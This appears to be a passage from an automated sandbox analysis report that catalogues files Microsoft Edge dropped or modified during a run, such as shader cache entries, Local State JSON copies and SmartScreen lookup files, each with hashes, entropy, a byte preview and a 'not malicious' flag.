Preview:	....BPLG.........C..94e127570f3a....................................................................................................................................P..............position........_uposition................................................................................................................P..............localCoord........_ulocalCoord........................................................................................................................R..............sk_RTAdjust........_usk_RTAdjust....................................................................................................................................................................[..............umatrix_Stage1_c0........_uumatrix_Stage1_c0....................................................................................................................................................................R..............uclamp_Stage1_c0_c0_c0_c0........_uuclamp_Stage1_c0_c0_c0_c0....

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000017

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	17256
Entropy (8bit):	4.631020011096026
Encrypted:	false
SSDEEP:	192:pOhIVSWROBNIzy6hjioWXF1IyEQ054a8CDIpOuylAZ604CkvL4CkEy4Ckqt4Ckft:TOIVWyB4a8CDIpOq
MD5:	DFCA1CCB5ABB64B76B44F14164BC9BD3
SHA1:	DAF8F5C5C9E9765B05554C830DC41B9AC067CA74
SHA-256:	1858D96AC65A57153922C1EDAA46B79B95454B0BFF0E901E6D5CE0046309FA36
SHA-512:	BC8C6313ADFC4751E77387604C3CF3E1817CAAE2C021BDA2E5EF4DE8245717AB54EAF08A05838B8F34001A10B52A532AA58C65C7CEC90BAC1967BE7AEAA2EF6D
Malicious:	false
Preview:	....BPLG........RC..94e127570f3a....................................................................................................................................P..............position........_uposition................................................................................................................P..............localCoord........_ulocalCoord........................................................................................................................R..............sk_RTAdjust........_usk_RTAdjust....................................................................................................................................................................[..............umatrix_Stage1_c0........_uumatrix_Stage1_c0....................................................................................................................................................................R..............uclamp_Stage1_c0_c0_c0_c0........_uuclamp_Stage1_c0_c0_c0_c0....

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000018

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	17308
Entropy (8bit):	4.637873469434896
Encrypted:	false
SSDEEP:	192:tOhIVSWROBNIay6hjioWXF1IyEQ0Y4a8CDIpOuy0AmNHn4wNaartN50:fOI+WyQ4a8CDIpOr
MD5:	51F1E6CB4FFB317DD86E5BB2CF26EFA3
SHA1:	C5282C42E09E24B3F8D067E519B6EA494DFAED52
SHA-256:	151051ACD79C21F66E910ECB63A5EA1718832772ADC7587B50FB6E6C57FB87AD
SHA-512:	6B3DC94CFC467DB66824EC26ECFFE11B3DA9FE9676CEB9A9D373C605283CE134A148C99EF3F0B2F0AC2F9E83E8F216E9E1974AF7059618B08695CA50FB26C63C
Malicious:	false
Preview:	....BPLG.........C..94e127570f3a....................................................................................................................................P..............position........_uposition................................................................................................................P..............localCoord........_ulocalCoord........................................................................................................................R..............sk_RTAdjust........_usk_RTAdjust....................................................................................................................................................................[..............umatrix_Stage1_c0........_uumatrix_Stage1_c0....................................................................................................................................................................R..............uclamp_Stage1_c0_c0_c0_c0........_uuclamp_Stage1_c0_c0_c0_c0....

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000019

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	22704
Entropy (8bit):	4.606023618541212
Encrypted:	false
SSDEEP:	192:dfUtWya2IVZwL3VKoUT4ILMUjo3CKW4IWKE8yxPfOWZXF1DPBEQ0cLiNmjcmc7wD:ywT4IYB6iRjew5wY5ZZqj3Fol0th
MD5:	46DEAB5A531E0A2B5A937353192A0935
SHA1:	E1AB0CA8199CC98352E17F4CEF9695691169CED4
SHA-256:	F324AEDF11B5AE79CDD5DBB4F448CA0C38ED42E43A3ABC5E8FBFF4B0F0897B76
SHA-512:	C84368B39353DD1776668E97DF30DB30455EFB9022CE16D0F9A383D5F161CBF6E5CF34525F8EF8671296239DDA7B2E5C2AD3F5FD422CCCEAAA76A5763E5BCCEB
Malicious:	false
Preview:	....BPLG.........X..94e127570f3a............?.?.?...?...............................................................................................................P..............unitCoord........_uunitCoord................................................................................................................R..............fillBounds........_ufillBounds................................................................................................................R..............affineMatrix........_uaffineMatrix................................................................................................................P..............translate........_utranslate................................................................................................................R..............color........_ucolor................................................................................................................R..............locations........_ulocations............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_00001a

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	19436
Entropy (8bit):	4.68026932003121
Encrypted:	false
SSDEEP:	192:5lWya2IVZwL3VKoUT4IzMUjoO2cggASr1ZXF1DPBEQ0cLi+mcRO19vv7rr3Fk3Oi:BwT4INB6iD3RO1xvj3Fm/Cm
MD5:	C74D7D0DF48BC46E858CEFD073BC8D59
SHA1:	C01FB2FDF619589F133755116087F12E51C2C1C1
SHA-256:	973ECF1C974297D470ADF182917AE73EF70DAD6922D2465CA4AB4C71578476B8
SHA-512:	E8792E8883FC98FD83A3A29928900C0004F56544BC5AED88BF0DADC8EC5B527D506AB720461D5E6D67DE7EB35731EED56F95BC463C431C582B44923801FA6592
Malicious:	false
Preview:	....BPLG.........K..94e127570f3a............?.?.?...?...............................................................................................................P..............unitCoord........_uunitCoord................................................................................................................R..............fillBounds........_ufillBounds................................................................................................................R..............affineMatrix........_uaffineMatrix................................................................................................................P..............translate........_utranslate................................................................................................................R..............color........_ucolor................................................................................................................R..............locations........_ulocations............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_00001b

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	21548
Entropy (8bit):	4.627859734457228
Encrypted:	false
SSDEEP:	192:ufU1Wya2IVZwL3VKoUT4IRMUjo3CKW4IWKE8EREoZXF1DPBEQ0cLiMfkuva7YRhO:3wT4ICB6i9jUYjwZY3j3FrF
MD5:	EF71329350F720270EBD0A58F9CE3FE2
SHA1:	BBD5B27B8E7E2C954C6D79AF833AF729E36381B1
SHA-256:	B1862B644DAC80CBA92AA97601E1D27068B9F63DFAF0AEDE46EBF57698CA02B5
SHA-512:	A9A92BD111488D9AB6674C151A5287DA5DF6324764B5EFE465FC9DA36340B8F2FC323392ACB3B9C4649B4FE1A260094AC20BA8CEEFD71B3FA82FCDDA6493ED86
Malicious:	false
Preview:	....BPLG.........T..94e127570f3a............?.?.?...?...............................................................................................................P..............unitCoord........_uunitCoord................................................................................................................R..............fillBounds........_ufillBounds................................................................................................................R..............affineMatrix........_uaffineMatrix................................................................................................................P..............translate........_utranslate................................................................................................................R..............color........_ucolor................................................................................................................R..............locations........_ulocations............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_00001c

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	20592
Entropy (8bit):	4.656259911016374
Encrypted:	false
SSDEEP:	192:DfUtWya2IVZwL3VKoUT4IfMUjo3CKW4IWKaMJqZXF1DPBEQ0cLiJDsp8704FV9pW:EwT4I8B6isYo0YV3pj3F/n
MD5:	3948E0DB70E57212DD7A551B7C339AA7
SHA1:	3713BCEE0B2B30A574516C4E05A9268B7C544116
SHA-256:	AF5E211178BFF6F131F50D075973ED776B5A3781C4BE019B84DE0EFEF4FDA6CA
SHA-512:	8A17B9AC7144CF211D3FEB9E44C497B95FD72E3E7450469B46E920F84B87BC8D023627BDC83D47778346088E7B70A2BB21801B7F79383895E5EC62D05AA46EA1
Malicious:	false
Preview:	....BPLG........\P..94e127570f3a............?.?.?...?...............................................................................................................P..............unitCoord........_uunitCoord................................................................................................................R..............fillBounds........_ufillBounds................................................................................................................R..............affineMatrix........_uaffineMatrix................................................................................................................P..............translate........_utranslate................................................................................................................R..............color........_ucolor................................................................................................................R..............locations........_ulocations............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	120
Entropy (8bit):	3.32524464792714
Encrypted:	false
SSDEEP:	3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
MD5:	A397E5983D4A1619E36143B4D804B870
SHA1:	AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
SHA-256:	9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
SHA-512:	4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
Malicious:	false
Preview:	C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	11
Entropy (8bit):	2.59490661824394
Encrypted:	false
SSDEEP:	3:gem3:gL3
MD5:	E60DFE28E77A79CD2CAA4F53BD711995
SHA1:	2A150938498D9778DAF21F87B3E52ABDD4084716
SHA-256:	D5E1FB030857E079A8FD6811C81BF756D23CED9AF5DC299354C88F89B763415E
SHA-512:	B2ED5D4C3EEB946C2C869988E227ACD771614D559E1C108578546AA919E74251B92C7A1241D5E113018AB20A4295BBBCC12B7C520FB1C13DB242EC1B02B74F43
Malicious:	false
Preview:	94.0.992.31

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	14977
Entropy (8bit):	5.632763846105866
Encrypted:	false
SSDEEP:	384:L9iIuERzA83h09RZxeIjj68y9TIKf+qNrB:gIuERzA83h09RZxd68y9TIKfHNd
MD5:	BE4E95118C704C5CA746B56400182684
SHA1:	669074AA2B661489C1D44DF7B04143D9E063E59B
SHA-256:	68CB799F7D7832D4C581597916F82EF08E057D7E9B59593642626CA7718EF1B5
SHA-512:	DC970C1134B8694E893C839E951B6A3CCD1CE75B166148D7F830F1E41EBB28A46B643EE8F77245DA64314615CE2FF3C6E7979887749620A51B342F300C1D7347
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF102d78c.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	14977
Entropy (8bit):	5.632763846105866
Encrypted:	false
SSDEEP:	384:L9iIuERzA83h09RZxeIjj68y9TIKf+qNrB:gIuERzA83h09RZxd68y9TIKfHNd
MD5:	BE4E95118C704C5CA746B56400182684
SHA1:	669074AA2B661489C1D44DF7B04143D9E063E59B
SHA-256:	68CB799F7D7832D4C581597916F82EF08E057D7E9B59593642626CA7718EF1B5
SHA-512:	DC970C1134B8694E893C839E951B6A3CCD1CE75B166148D7F830F1E41EBB28A46B643EE8F77245DA64314615CE2FF3C6E7979887749620A51B342F300C1D7347
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF102d829.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	14977
Entropy (8bit):	5.632763846105866
Encrypted:	false
SSDEEP:	384:L9iIuERzA83h09RZxeIjj68y9TIKf+qNrB:gIuERzA83h09RZxd68y9TIKfHNd
MD5:	BE4E95118C704C5CA746B56400182684
SHA1:	669074AA2B661489C1D44DF7B04143D9E063E59B
SHA-256:	68CB799F7D7832D4C581597916F82EF08E057D7E9B59593642626CA7718EF1B5
SHA-512:	DC970C1134B8694E893C839E951B6A3CCD1CE75B166148D7F830F1E41EBB28A46B643EE8F77245DA64314615CE2FF3C6E7979887749620A51B342F300C1D7347
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF102d980.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	14977
Entropy (8bit):	5.632763846105866
Encrypted:	false
SSDEEP:	384:L9iIuERzA83h09RZxeIjj68y9TIKf+qNrB:gIuERzA83h09RZxd68y9TIKfHNd
MD5:	BE4E95118C704C5CA746B56400182684
SHA1:	669074AA2B661489C1D44DF7B04143D9E063E59B
SHA-256:	68CB799F7D7832D4C581597916F82EF08E057D7E9B59593642626CA7718EF1B5
SHA-512:	DC970C1134B8694E893C839E951B6A3CCD1CE75B166148D7F830F1E41EBB28A46B643EE8F77245DA64314615CE2FF3C6E7979887749620A51B342F300C1D7347
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF102da7a.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	14977
Entropy (8bit):	5.632763846105866
Encrypted:	false
SSDEEP:	384:L9iIuERzA83h09RZxeIjj68y9TIKf+qNrB:gIuERzA83h09RZxd68y9TIKfHNd
MD5:	BE4E95118C704C5CA746B56400182684
SHA1:	669074AA2B661489C1D44DF7B04143D9E063E59B
SHA-256:	68CB799F7D7832D4C581597916F82EF08E057D7E9B59593642626CA7718EF1B5
SHA-512:	DC970C1134B8694E893C839E951B6A3CCD1CE75B166148D7F830F1E41EBB28A46B643EE8F77245DA64314615CE2FF3C6E7979887749620A51B342F300C1D7347
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF1072c02.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	14977
Entropy (8bit):	5.632763846105866
Encrypted:	false
SSDEEP:	384:L9iIuERzA83h09RZxeIjj68y9TIKf+qNrB:gIuERzA83h09RZxd68y9TIKfHNd
MD5:	BE4E95118C704C5CA746B56400182684
SHA1:	669074AA2B661489C1D44DF7B04143D9E063E59B
SHA-256:	68CB799F7D7832D4C581597916F82EF08E057D7E9B59593642626CA7718EF1B5
SHA-512:	DC970C1134B8694E893C839E951B6A3CCD1CE75B166148D7F830F1E41EBB28A46B643EE8F77245DA64314615CE2FF3C6E7979887749620A51B342F300C1D7347
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	modified
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\synchronousLookupUris

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.346439344671015
Encrypted:	false
SSDEEP:	3:kfKbUPVXXMVQX:kygV5
MD5:	6A3A60A3F78299444AACAA89710A64B6
SHA1:	2A052BF5CF54F980475085EEF459D94C3CE5EF55
SHA-256:	61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
SHA-512:	C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
Malicious:	false
Preview:	synchronousLookupUris_638343870221005468

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\synchronousLookupUris_638343870221005468

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	57
Entropy (8bit):	4.556488479039065
Encrypted:	false
SSDEEP:	3:GSCIPPlzYxi21goD:bCWBYx99D
MD5:	3A05EAEA94307F8C57BAC69C3DF64E59
SHA1:	9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
SHA-256:	A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
SHA-512:	6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
Malicious:	false
Preview:	9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\a2907359-712e-4124-9b47-12f104c217ab.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	14969
Entropy (8bit):	5.6259746286264765
Encrypted:	false
SSDEEP:	384:U9iIuERzA83h09RZxeIyRy8yXxvIKf+qNrB:/IuERzA83h09RZxAy8yXxvIKfHNd
MD5:	6D07C8FC7769853BE173E0C3A0904920
SHA1:	E51E749FDE56FE6CDDC42D56681124BDD8357180
SHA-256:	55164D0E7F1E54D4A7F6EF6ACDBEB5F1FDA3E503EF39EEAC8CADE1DBFE0686A6
SHA-512:	37DD6AB70E0B7CD3383085D433E559F78E1328A49FDD85BE15A90230191DFA881D9D3C4F0B954434902245F2DAA8C9202DFC901C2D90EB87B7940E5D03F245B7
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\a2ac737e-9481-44ad-972d-eb0ac26d2bb4.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	14977
Entropy (8bit):	5.632763846105866
Encrypted:	false
SSDEEP:	384:L9iIuERzA83h09RZxeIjj68y9TIKf+qNrB:gIuERzA83h09RZxd68y9TIKfHNd
MD5:	BE4E95118C704C5CA746B56400182684
SHA1:	669074AA2B661489C1D44DF7B04143D9E063E59B
SHA-256:	68CB799F7D7832D4C581597916F82EF08E057D7E9B59593642626CA7718EF1B5
SHA-512:	DC970C1134B8694E893C839E951B6A3CCD1CE75B166148D7F830F1E41EBB28A46B643EE8F77245DA64314615CE2FF3C6E7979887749620A51B342F300C1D7347
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ad44295b-d047-4160-a772-14aa962c3152.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	14977
Entropy (8bit):	5.632691128116544
Encrypted:	false
SSDEEP:	384:L9iIuERzA83h09RZxeIjj68y2bIKf+qNrB:gIuERzA83h09RZxd68y2bIKfHNd
MD5:	376C172E5F0D7F11E1A9E23796205324
SHA1:	2A0B2F4A423E539E04EABB2F12ED50252715E555
SHA-256:	941F277CF7725F573E0E5A51E0443954FEDF244A543E22CF02BDEC477241834B
SHA-512:	CF74003C938437E8C9B48FD18884E1ACD82D02245BDAB62139FDD17BCBD07F3406C8C9A9F6C21A1FE6F2F10E5720FBC921470E8BFAE2AEF6E206EB812A36C4F6
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\fdc5f7d6-01f0-47bf-ad76-38d5ebd4d987.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	14979
Entropy (8bit):	5.632869962755904
Encrypted:	false
SSDEEP:	384:L9iIuERzA83h09RZxeIjjt8y2bIKf+qNrB:gIuERzA83h09RZxdt8y2bIKfHNd
MD5:	F10567E0D0FF5FD4E3AFC917C8D5D197
SHA1:	37E7F13D94FC9B7F6BBBB22930CD41FF9DC0AC7A
SHA-256:	4ACACEF812F6E867A3557BA9AAA643AD258EBE36C031B31CCDF868296B6BA664
SHA-512:	C178B33C6A049CA9BCA7FC210A0FD179F34F31E7BA2932D1A3FE9E8235FC7D789BF785B5BD4FCF3CC681A5F24C266467FAB8563DBFD56DDB208082E10F6B06EA
Malicious:	false
